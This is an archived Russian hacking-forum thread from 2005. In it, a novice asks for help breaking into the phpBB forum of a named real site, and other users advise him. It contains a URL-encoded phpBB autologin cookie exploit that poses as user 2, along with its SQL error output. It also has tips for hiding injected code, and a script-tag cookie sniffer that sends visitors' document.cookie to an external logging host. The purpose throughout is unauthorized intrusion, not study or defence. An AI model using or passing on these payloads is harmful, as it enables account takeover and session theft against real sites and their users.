PDA

Просмотр полной версии : http://www.piercing.ru/phpBB/


gannibal
24.11.2005, 23:55
я токо начал в этой всей области разбераться и вот нужно мне сломать форум на этом сайте......кое что что знаю перепробывал но пока практически ничего, ккто может посоветуйте что можно еще попробывать....вот попробывал сплоит залить и мне после обновления выдал.....из выданного пока ничего не понял - вот разбираюсь кто может если то подсккажите
- моглобы это что то значить?

1062 - Duplicate entry 'a:2:{s:11:\"autologinid\";b:1;s:' for key 1

insert into sessions values ('a:2:{s:11:\\\"autologinid\\\";b:1;s:6:\\\"userid\\\";s:1:\\\"2\\\";}', '1132863197', 'cart|O:12:\"shoppingcart\":4:{s:8:\"contents\";a:0:{}s:5:\"total\";i:0;s:6:\"weight\";i:0;s:12:\"content_type\";b:0;}language|s:7:\"russian\";languages_id|s:1:\"4\";currency|s:3:\"RUR\";navigation|O:17:\"navigationhistory\":2:{s:4:\"path\";a:1:{i:0;a:4:{s:4:\"page\";s:9:\"index.php\";s:4:\"mode\";s:6:\"NONSSL\";s:3:\"get\";a:0:{}s:4:\"post\";a:0:{}}}s:8:\"snapshot\";a:0:{}}')

[TEP STOP]

1062 - Duplicate entry 'a:2:{s:11:\"autologinid\";b:1;s:' for key 1

insert into sessions values ('a:2:{s:11:\\\"autologinid\\\";b:1;s:6:\\\"userid\\\";s:1:\\\"2\\\";}', '1132863197', 'cart|O:12:\"shoppingcart\":4:{s:8:\"contents\";a:0:{}s:5:\"total\";i:0;s:6:\"weight\";i:0;s:12:\"content_type\";b:0;}language|s:7:\"russian\";languages_id|s:1:\"4\";currency|s:3:\"RUR\";navigation|O:17:\"navigationhistory\":2:{s:4:\"path\";a:1:{i:0;a:4:{s:4:\"page\";s:9:\"index.php\";s:4:\"mode\";s:6:\"NONSSL\";s:3:\"get\";a:0:{}s:4:\"post\";a:0:{}}}s:8:\"snapshot\";a:0:{}}')

[TEP STOP]


Warning: Unknown(): A session is active. You cannot change the session module's ini settings at this time. in Unknown on line 0

qBiN
25.11.2005, 00:22
версия форума? что за сплойт?

gannibal
25.11.2005, 00:26
вот версию как раз и не знаю - а как узнать? может прогой какой
в одной из видео по phpbb/
вот таккой Exploit: : a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs% 3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D

вот что делать дальше пока не пойму...........щас буду смотреть дальше видео.........но если кто может подскажите что-нить............

syntacsis
25.11.2005, 01:25
gannibal, этот форум ломается. чтобы его сломать надо внимательно прочитать античат. это phpbb - версия 17 или 18. если его админ не читал античат, то форум уязвим.
мне тоже надо было поломать такой форум, но не получалось, так как я ламер. сначала одно не получfлось, потом другое. но в итоге всетаки ломанул. в админку правда попасть не получилось. зашел под модером.
тебе надо изучить эти темы:
http://forum.antichat.ru/thread10613.html
http://forum.antichat.ru/thread10757.html

Коду wj на форуме дай цвет фона или близкий и задай размер 1. "url" в коде замени на "URL".

gannibal
25.11.2005, 01:32
да вот как раз изучаю но не все же понятно с первого раза вот поэтому и спрашиваю - на что надо именно акцент. внимание

вот решил в форум запустить снифер с античата (<script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script> ) который при показе лога в античате поазывает куки, я так понимаю) но когда смотрю лог в строке QUERY что то ничего нету, может что не праильно делаю? и почемуто в форуме у меня видна эта ссыла (я так понимаю гдето не зарыты или не поставленны овычкки - но чето не пойму где их надо зарывать), подсажите!!!! токо поподробнее если что объясняйте а то я токо я пока новичек в этом деле

PSalm69
25.11.2005, 11:10
Неее, не так. Стукни в аську обьясню. Если по статье не понял.